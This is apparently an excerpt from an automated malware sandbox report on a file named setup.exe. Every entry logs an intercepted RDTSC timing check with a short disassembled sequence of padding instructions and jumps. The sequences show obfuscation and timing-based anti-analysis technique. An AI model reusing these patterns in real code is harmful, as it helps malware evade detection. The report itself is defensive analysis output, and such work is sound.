                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60AA52 second address: 60AA63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60AA63 second address: 60AA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A27Ah 0x00000009 popad 0x0000000a popad 0x0000000b jc 00007FC16945A29Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60AA7D second address: 60AA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A62D7 second address: 5A62DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A62DB second address: 5A62FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC169461AA5h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A62FB second address: 5A6307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A6307 second address: 5A6311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC169461A96h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A6311 second address: 5A631D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC16945A276h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A631D second address: 5A6329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FC169461A96h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 610FF1 second address: 610FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 610FF5 second address: 611000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 611000 second address: 611006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 611006 second address: 61100D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61100D second address: 611015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 615CFA second address: 615D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461A9Ch 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FC169461A9Eh 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 615D18 second address: 615D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 615D20 second address: 615D25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 614F3B second address: 614F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A287h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC16945A276h 0x0000000f jmp 00007FC16945A27Ch 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 614F68 second address: 614FAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007FC169461AA8h 0x00000013 jnc 00007FC169461A96h 0x00000019 pop edi 0x0000001a jmp 00007FC169461AA2h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 614FAE second address: 614FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 614FB4 second address: 614FBE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 614FBE second address: 614FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 615130 second address: 61513B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61513B second address: 615150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A27Ah 0x00000009 jc 00007FC16945A276h 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 615426 second address: 61542A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6155AF second address: 6155B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6159F9 second address: 6159FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6159FF second address: 615A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FC16945A27Eh 0x0000000b pushad 0x0000000c jmp 00007FC16945A27Ah 0x00000011 push esi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 617282 second address: 61728D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61728D second address: 617291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61FB56 second address: 61FB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AB3A8 second address: 5AB3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A289h 0x00000009 jmp 00007FC16945A289h 0x0000000e jmp 00007FC16945A287h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FC16945A276h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AB3FE second address: 5AB40A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AB40A second address: 5AB40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61E904 second address: 61E908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EA5A second address: 61EA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A283h 0x00000009 jg 00007FC16945A276h 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EA78 second address: 61EA98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jbe 00007FC169461A96h 0x0000000b jp 00007FC169461A96h 0x00000011 jnl 00007FC169461A96h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EA98 second address: 61EAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC16945A27Ah 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EAAF second address: 61EAB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EC22 second address: 61EC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EC26 second address: 61EC49 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC169461A96h 0x00000008 jmp 00007FC169461AA9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EF4C second address: 61EF54 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EF54 second address: 61EF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EF5C second address: 61EF74 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC16945A276h 0x00000008 jl 00007FC16945A276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FC16945A276h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61EF74 second address: 61EF7E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61F0CC second address: 61F0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61F602 second address: 61F608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61F608 second address: 61F60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61F60C second address: 61F612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 61F612 second address: 61F62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FC16945A282h 0x0000000c jmp 00007FC16945A27Ch 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 628174 second address: 628179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 628179 second address: 628192 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC16945A27Bh 0x00000008 jp 00007FC16945A276h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 628192 second address: 628196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 626FD9 second address: 627019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC16945A281h 0x00000008 jmp 00007FC16945A285h 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007FC16945A276h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007FC16945A276h 0x0000001e jnp 00007FC16945A276h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 627019 second address: 62701D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA4C8 second address: 5EA4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC16945A276h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA73F second address: 5EA745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EAD0E second address: 5EAD21 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC16945A278h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EAFC6 second address: 5EAFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC169461A9Bh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 jp 00007FC169461A9Ch 0x00000016 lea eax, dword ptr [ebp+1248EA70h] 0x0000001c sub edx, dword ptr [ebp+122D29EFh] 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5A483F second address: 5A4852 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007FC16945A276h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B3476 second address: 6B347E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B347E second address: 6B3482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B3482 second address: 6B3486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B31CD second address: 6B31D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6B31D1 second address: 6B31E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC169461A98h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f js 00007FC169461AA0h 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CBDD5 second address: 6CBE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FC16945A286h 0x0000000b jmp 00007FC16945A27Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CBE03 second address: 6CBE19 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC169461A96h 0x00000008 jmp 00007FC169461A9Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CBE19 second address: 6CBE79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC16945A283h 0x00000008 jmp 00007FC16945A284h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jc 00007FC16945A2A5h 0x00000020 jmp 00007FC16945A27Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC16945A281h 0x0000002c jbe 00007FC16945A276h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CB039 second address: 6CB043 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CB043 second address: 6CB063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A286h 0x00000009 jo 00007FC16945A276h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CB063 second address: 6CB069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CB58C second address: 6CB590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CB590 second address: 6CB5B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC169461AA9h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CE7C6 second address: 6CE7CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6CE84C second address: 6CE856 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D00F7 second address: 6D00FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D1BBD second address: 6D1BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D1BC1 second address: 6D1BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D178C second address: 6D17AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FC169461A9Ah 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D17AB second address: 6D17B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC16945A276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D3521 second address: 6D353A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D353A second address: 6D353E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D353E second address: 6D3552 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6D3552 second address: 6D3563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007FC16945A276h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110160 second address: 5110187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461AA9h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110187 second address: 5110197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A27Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100042 second address: 5100056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100056 second address: 5100128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 mov ebx, eax 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FC16945A27Ah 0x0000001a jmp 00007FC16945A285h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC16945A27Ch 0x00000029 adc cx, B4C8h 0x0000002e jmp 00007FC16945A27Bh 0x00000033 popfd 0x00000034 pushfd 0x00000035 jmp 00007FC16945A288h 0x0000003a add ah, 00000028h 0x0000003d jmp 00007FC16945A27Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 pushad 0x00000047 call 00007FC16945A280h 0x0000004c mov bh, ah 0x0000004e pop edi 0x0000004f popad 0x00000050 pop ebp 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007FC16945A27Fh 0x0000005a add si, CDCEh 0x0000005f jmp 00007FC16945A289h 0x00000064 popfd 0x00000065 push eax 0x00000066 pop edi 0x00000067 popad 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100128 second address: 5100144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130B1A second address: 5130B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC16945A27Ch 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D00DF second address: 50D012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1C78C7E3h 0x00000008 pushfd 0x00000009 jmp 00007FC169461AA8h 0x0000000e xor ecx, 5E5AB828h 0x00000014 jmp 00007FC169461A9Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC169461AA5h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D012D second address: 50D0133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0133 second address: 50D0137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
